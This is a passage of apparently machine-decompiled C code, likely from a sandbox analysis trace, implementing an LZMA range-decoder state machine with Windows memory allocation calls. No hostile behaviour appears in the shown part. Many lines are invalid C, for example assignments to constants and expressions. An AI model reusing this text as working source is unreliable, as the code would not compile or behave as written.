                    													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                    													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    													goto L15;
                    												} else {
                    													goto L11;
                    												}
                    												do {
                    													L11:
                    													_t612 = _t612 - 1;
                    													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                    												} while (_t612 != 0);
                    												goto L12;
                    											}
                    											if( *(_t613 - 4) != 0) {
                    												GlobalFree( *(_t613 - 4));
                    											}
                    											_t534 = GlobalAlloc(0x40, 0x600); // executed
                    											 *(_t613 - 4) = _t534;
                    											if(_t534 == 0) {
                    												goto L171;
                    											} else {
                    												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                    												goto L10;
                    											}
                    										case 1:
                    											L13:
                    											__eflags =  *(_t613 - 0x6c);
                    											if( *(_t613 - 0x6c) == 0) {
                    												 *(_t613 - 0x88) = 1;
                    												goto L170;
                    											}
                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                    											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    											_t45 = _t613 - 0x48;
                    											 *_t45 =  *(_t613 - 0x48) + 1;
                    											__eflags =  *_t45;
                    											L15:
                    											if( *(_t613 - 0x48) < 4) {
                    												goto L13;
                    											}
                    											_t546 =  *(_t613 - 0x40);
                    											if(_t546 ==  *(_t613 - 0x74)) {
                    												L20:
                    												 *(_t613 - 0x48) = 5;
                    												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                    												goto L23;
                    											}
                    											 *(_t613 - 0x74) = _t546;
                    											if( *(_t613 - 8) != 0) {
                    												GlobalFree( *(_t613 - 8));
                    											}
                    											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                    											 *(_t613 - 8) = _t534;
                    											if(_t534 == 0) {
                    												goto L171;
                    											} else {
                    												goto L20;
                    											}
                    										case 2:
                    											L24:
                    											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                    											 *(_t613 - 0x84) = 6;
                    											 *(_t613 - 0x4c) = _t553;
                    											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                    											 *(_t613 - 0x54) = _t606;
                    											goto L133;
                    										case 3:
                    											L21:
                    											__eflags =  *(_t613 - 0x6c);
                    											if( *(_t613 - 0x6c) == 0) {
                    												 *(_t613 - 0x88) = 3;
                    												goto L170;
                    											}
                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    											_t67 = _t613 - 0x70;
                    											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                    											__eflags =  *_t67;
                    											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    											L23:
                    											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                    											if( *(_t613 - 0x48) != 0) {
                    												goto L21;
                    											}
                    											goto L24;
                    										case 4:
                    											L133:
                    											_t531 =  *_t606;
                    											_t589 = _t531 & 0x0000ffff;
                    											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                    											if( *(_t613 - 0xc) >= _t565) {
                    												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                    												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                    												 *(_t613 - 0x40) = 1;
                    												_t532 = _t531 - (_t531 >> 5);
                    												 *_t606 = _t532;
                    											} else {
                    												 *(_t613 - 0x10) = _t565;
                    												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                    											}
                    											if( *(_t613 - 0x10) >= 0x1000000) {
                    												goto L139;
                    											}
                    										case 5:
                    											goto L137;
                    										case 6:
                    											__edx = 0;
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) = 1;
                    												 *(__ebp - 0x84) = 7;
                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    												while(1) {
                    													 *(_t613 - 0x54) = _t606;
                    													goto L133;
                    												}
                    											}
                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    											__esi =  *(__ebp - 0x60);
                    											__cl = 8;
                    											__cl = 8 -  *(__ebp - 0x3c);
                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    											__ecx =  *(__ebp - 0x3c);
                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    											__ecx =  *(__ebp - 4);
                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    											__eflags =  *(__ebp - 0x38) - 4;
                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											if( *(__ebp - 0x38) >= 4) {
                    												__eflags =  *(__ebp - 0x38) - 0xa;
                    												if( *(__ebp - 0x38) >= 0xa) {
                    													_t98 = __ebp - 0x38;
                    													 *_t98 =  *(__ebp - 0x38) - 6;
                    													__eflags =  *_t98;
                    												} else {
                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    												}
                    											} else {
                    												 *(__ebp - 0x38) = 0;
                    											}
                    											__eflags =  *(__ebp - 0x34) - __edx;
                    											if( *(__ebp - 0x34) == __edx) {
                    												__ebx = 0;
                    												__ebx = 1;
                    												goto L61;
                    											} else {
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__ecx =  *(__ebp - 8);
                    												__ebx = 0;
                    												__ebx = 1;
                    												__al =  *((intOrPtr*)(__eax + __ecx));
                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    												goto L41;
                    											}
                    										case 7:
                    											__eflags =  *(__ebp - 0x40) - 1;
                    											if( *(__ebp - 0x40) != 1) {
                    												__eax =  *(__ebp - 0x24);
                    												 *(__ebp - 0x80) = 0x16;
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x28);
                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    												__eax =  *(__ebp - 0x2c);
                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    												__al = __al & 0x000000fd;
                    												__eax = (__eflags >= 0) - 1 + 0xa;
                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    												__eax =  *(__ebp - 4);
                    												__eax =  *(__ebp - 4) + 0x664;
                    												__eflags = __eax;
                    												 *(__ebp - 0x58) = __eax;
                    												goto L69;
                    											}
                    											__eax =  *(__ebp - 4);
                    											__ecx =  *(__ebp - 0x38);
                    											 *(__ebp - 0x84) = 8;
                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    											while(1) {
                    												 *(_t613 - 0x54) = _t606;
                    												goto L133;
                    											}
                    										case 8:
                    											goto L0;
                    										case 9:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												goto L89;
                    											}
                    											__eflags =  *(__ebp - 0x60);
                    											if( *(__ebp - 0x60) == 0) {
                    												goto L171;
                    											}
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                    											__eflags = _t258;
                    											0 | _t258 = _t258 + _t258 + 9;
                    											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                    											goto L75;
                    										case 0xa:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 0xb;
                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    												while(1) {
                    													 *(_t613 - 0x54) = _t606;
                    													goto L133;
                    												}
                    											}
                    											__eax =  *(__ebp - 0x28);
                    											goto L88;
                    										case 0xb:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__ecx =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x20);
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    											} else {
                    												__eax =  *(__ebp - 0x24);
                    											}
                    											__ecx =  *(__ebp - 0x28);
                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    											L88:
                    											__ecx =  *(__ebp - 0x2c);
                    											 *(__ebp - 0x2c) = __eax;
                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    											L89:
                    											__eax =  *(__ebp - 4);
                    											 *(__ebp - 0x80) = 0x15;
                    											__eax =  *(__ebp - 4) + 0xa68;
                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    											goto L69;
                    										case 0xc:
                    											L99:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xc;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t334 = __ebp - 0x70;
                    											 *_t334 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t334;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											__eax =  *(__ebp - 0x2c);
                    											goto L101;
                    										case 0xd:
                    											L37:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xd;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t122 = __ebp - 0x70;
                    											 *_t122 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t122;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L39:
                    											__eax =  *(__ebp - 0x40);
                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    												goto L48;
                    											}
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												goto L54;
                    											}
                    											L41:
                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    											__ecx =  *(__ebp - 0x58);
                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    											 *(__ebp - 0x48) = __eax;
                    											__eax = __eax + 1;
                    											__eax = __eax << 8;
                    											__eax = __eax + __ebx;
                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edx = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												 *(__ebp - 0x40) = 1;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												__ebx = __ebx + __ebx + 1;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edx;
                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L39;
                    											} else {
                    												goto L37;
                    											}
                    										case 0xe:
                    											L46:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xe;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t156 = __ebp - 0x70;
                    											 *_t156 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t156;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											while(1) {
                    												L48:
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													break;
                    												}
                    												__eax =  *(__ebp - 0x58);
                    												__edx = __ebx + __ebx;
                    												__ecx =  *(__ebp - 0x10);
                    												__esi = __edx + __eax;
                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													_t170 = __edx + 1; // 0x1
                    													__ebx = _t170;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													continue;
                    												} else {
                    													goto L46;
                    												}
                    											}
                    											L54:
                    											_t173 = __ebp - 0x34;
                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    											__eflags =  *_t173;
                    											goto L55;
                    										case 0xf:
                    											L58:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xf;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t203 = __ebp - 0x70;
                    											 *_t203 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t203;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L60:
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												L55:
                    												__al =  *(__ebp - 0x44);
                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    												goto L56;
                    											}
                    											L61:
                    											__eax =  *(__ebp - 0x58);
                    											__edx = __ebx + __ebx;
                    											__ecx =  *(__ebp - 0x10);
                    											__esi = __edx + __eax;
                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edi = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												_t217 = __edx + 1; // 0x1
                    												__ebx = _t217;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edi;
                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L60;
                    											} else {
                    												goto L58;
                    											}
                    										case 0x10:
                    											L109:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0x10;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t365 = __ebp - 0x70;
                    											 *_t365 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t365;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											goto L111;
                    										case 0x11:
                    											L69:
                    											__esi =  *(__ebp - 0x58);
                    											 *(__ebp - 0x84) = 0x12;
                    											while(1) {
                    												 *(_t613 - 0x54) = _t606;
                    												goto L133;
                    											}
                    										case 0x12:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 0x58);
                    												 *(__ebp - 0x84) = 0x13;
                    												__esi =  *(__ebp - 0x58) + 2;
                    												while(1) {
                    													 *(_t613 - 0x54) = _t606;
                    													goto L133;
                    												}
                    											}
                    											__eax =  *(__ebp - 0x4c);
                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    											__ecx =  *(__ebp - 0x58);
                    											__eax =  *(__ebp - 0x4c) << 4;
                    											__eflags = __eax;
                    											__eax =  *(__ebp - 0x58) + __eax + 4;
                    											goto L130;
                    										case 0x13:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												_t469 = __ebp - 0x58;
                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                    												__eflags =  *_t469;
                    												 *(__ebp - 0x30) = 0x10;
                    												 *(__ebp - 0x40) = 8;
                    												L144:
                    												 *(__ebp - 0x7c) = 0x14;
                    												goto L145;
                    											}
                    											__eax =  *(__ebp - 0x4c);
                    											__ecx =  *(__ebp - 0x58);
                    											__eax =  *(__ebp - 0x4c) << 4;
                    											 *(__ebp - 0x30) = 8;
                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    											L130:
                    											 *(__ebp - 0x58) = __eax;
                    											 *(__ebp - 0x40) = 3;
                    											goto L144;
                    										case 0x14:
                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    											__eax =  *(__ebp - 0x80);
                    											 *(_t613 - 0x88) = _t533;
                    											goto L1;
                    										case 0x15:
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    											__al = __al & 0x000000fd;
                    											__eax = (__eflags >= 0) - 1 + 0xb;
                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    											goto L120;
                    										case 0x16:
                    											__eax =  *(__ebp - 0x30);
                    											__eflags = __eax - 4;
                    											if(__eax >= 4) {
                    												_push(3);
                    												_pop(__eax);
                    											}
                    											__ecx =  *(__ebp - 4);
                    											 *(__ebp - 0x40) = 6;
                    											__eax = __eax << 7;
                    											 *(__ebp - 0x7c) = 0x19;
                    											 *(__ebp - 0x58) = __eax;
                    											goto L145;
                    										case 0x17:
                    											L145:
                    											__eax =  *(__ebp - 0x40);
                    											 *(__ebp - 0x50) = 1;
                    											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    											goto L149;
                    										case 0x18:
                    											L146:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0x18;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t484 = __ebp - 0x70;
                    											 *_t484 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t484;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L148:
                    											_t487 = __ebp - 0x48;
                    											 *_t487 =  *(__ebp - 0x48) - 1;
                    											__eflags =  *_t487;
                    											L149:
                    											__eflags =  *(__ebp - 0x48);
                    											if( *(__ebp - 0x48) <= 0) {
                    												__ecx =  *(__ebp - 0x40);
                    												__ebx =  *(__ebp - 0x50);
                    												0 = 1;
                    												__eax = 1 << __cl;
                    												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    												__eax =  *(__ebp - 0x7c);
                    												 *(__ebp - 0x44) = __ebx;
                    												while(1) {
                    													 *(_t613 - 0x88) = _t533;
                    													goto L1;
                    												}
                    											}
                    											__eax =  *(__ebp - 0x50);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    											__eax =  *(__ebp - 0x58);
                    											__esi = __edx + __eax;
                    											 *(__ebp - 0x54) = __esi;
                    											__ax =  *__esi;
                    											__edi = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												__cx = __ax >> 5;
                    												__eax = __eax - __ecx;
                    												__edx = __edx + 1;
                    												__eflags = __edx;
                    												 *__esi = __ax;
                    												 *(__ebp - 0x50) = __edx;
                    											} else {
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edi;
                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L148;
                    											} else {
                    												goto L146;
                    											}
                    										case 0x19:
                    											__eflags = __ebx - 4;
                    											if(__ebx < 4) {
                    												 *(__ebp - 0x2c) = __ebx;
                    												L119:
                    												_t393 = __ebp - 0x2c;
                    												 *_t393 =  *(__ebp - 0x2c) + 1;
                    												__eflags =  *_t393;
                    												L120:
                    												__eax =  *(__ebp - 0x2c);
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    													goto L170;
                    												}
                    												__eflags = __eax -  *(__ebp - 0x60);
                    												if(__eax >  *(__ebp - 0x60)) {
                    													goto L171;
                    												}
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    												__eax =  *(__ebp - 0x30);
                    												_t400 = __ebp - 0x60;
                    												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    												__eflags =  *_t400;
                    												goto L123;
                    											}
                    											__ecx = __ebx;
                    											__eax = __ebx;
                    											__ecx = __ebx >> 1;
                    											__eax = __ebx & 0x00000001;
                    											__ecx = (__ebx >> 1) - 1;
                    											__al = __al | 0x00000002;
                    											__eax = (__ebx & 0x00000001) << __cl;
                    											__eflags = __ebx - 0xe;
                    											 *(__ebp - 0x2c) = __eax;
                    											if(__ebx >= 0xe) {
                    												__ebx = 0;
                    												 *(__ebp - 0x48) = __ecx;
                    												L102:
                    												__eflags =  *(__ebp - 0x48);
                    												if( *(__ebp - 0x48) <= 0) {
                    													__eax = __eax + __ebx;
                    													 *(__ebp - 0x40) = 4;
                    													 *(__ebp - 0x2c) = __eax;
                    													__eax =  *(__ebp - 4);
                    													__eax =  *(__ebp - 4) + 0x644;
                    													__eflags = __eax;
                    													L108:
                    													__ebx = 0;
                    													 *(__ebp - 0x58) = __eax;
                    													 *(__ebp - 0x50) = 1;
                    													 *(__ebp - 0x44) = 0;
                    													 *(__ebp - 0x48) = 0;
                    													L112:
                    													__eax =  *(__ebp - 0x40);
                    													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    														_t391 = __ebp - 0x2c;
                    														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    														__eflags =  *_t391;
                    														goto L119;
                    													}
                    													__eax =  *(__ebp - 0x50);
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    													__eax =  *(__ebp - 0x58);
                    													__esi = __edi + __eax;
                    													 *(__ebp - 0x54) = __esi;
                    													__ax =  *__esi;
                    													__ecx = __ax & 0x0000ffff;
                    													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    													__eflags =  *(__ebp - 0xc) - __edx;
                    													if( *(__ebp - 0xc) >= __edx) {
                    														__ecx = 0;
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    														__ecx = 1;
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    														__ebx = 1;
                    														__ecx =  *(__ebp - 0x48);
                    														__ebx = 1 << __cl;
                    														__ecx = 1 << __cl;
                    														__ebx =  *(__ebp - 0x44);
                    														__ebx =  *(__ebp - 0x44) | __ecx;
                    														__cx = __ax;
                    														__cx = __ax >> 5;
                    														__eax = __eax - __ecx;
                    														__edi = __edi + 1;
                    														__eflags = __edi;
                    														 *(__ebp - 0x44) = __ebx;
                    														 *__esi = __ax;
                    														 *(__ebp - 0x50) = __edi;
                    													} else {
                    														 *(__ebp - 0x10) = __edx;
                    														0x800 = 0x800 - __ecx;
                    														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
